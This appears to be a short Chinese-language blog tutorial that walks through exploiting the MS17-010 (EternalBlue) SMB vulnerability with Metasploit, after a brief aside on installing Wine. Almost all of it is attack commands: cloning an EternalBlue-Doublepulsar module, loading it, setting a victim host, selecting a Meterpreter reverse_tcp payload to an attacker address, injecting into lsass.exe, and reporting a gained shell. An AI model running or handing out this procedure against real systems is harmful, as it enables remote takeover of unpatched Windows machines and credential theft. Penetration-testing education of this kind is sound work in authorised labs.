ms17-010

使用wine可以在linux下运行windows程序。

root@ubuntu:~# apt-get install wine  安装wine

coler@ubuntu:~/Desktop$ wine cmd.exe  打开cmd.exe

coler@ubuntu:~/Desktop$ wine TeamViewer.exe  打开TeamViewer


下面是漏洞利用过程:

root@kali:~# git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

root@kali:~# cp Eternalblue-Doublepulsar-Metasploit/eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/  将漏洞利用代码拷贝到msf的exploit模块中

msf > reload_all  重新加载所有模块

msf > use exploit/windows/smb/eternalblue_doublepulsar

msf exploit(eternalblue_doublepulsar) > set rhost 192.168.80.33

msf exploit(eternalblue_doublepulsar) > set payload windows/meterpreter/reverse_tcp

msf exploit(eternalblue_doublepulsar) > set lhost 192.168.80.163

msf exploit(eternalblue_doublepulsar) > set processinject lsass.exe

msf exploit(eternalblue_doublepulsar) > set target 9

msf exploit(eternalblue_doublepulsar) > exploit

ms17-010_第1张图片
成功获得shell

你可能感兴趣的:(ms17-010)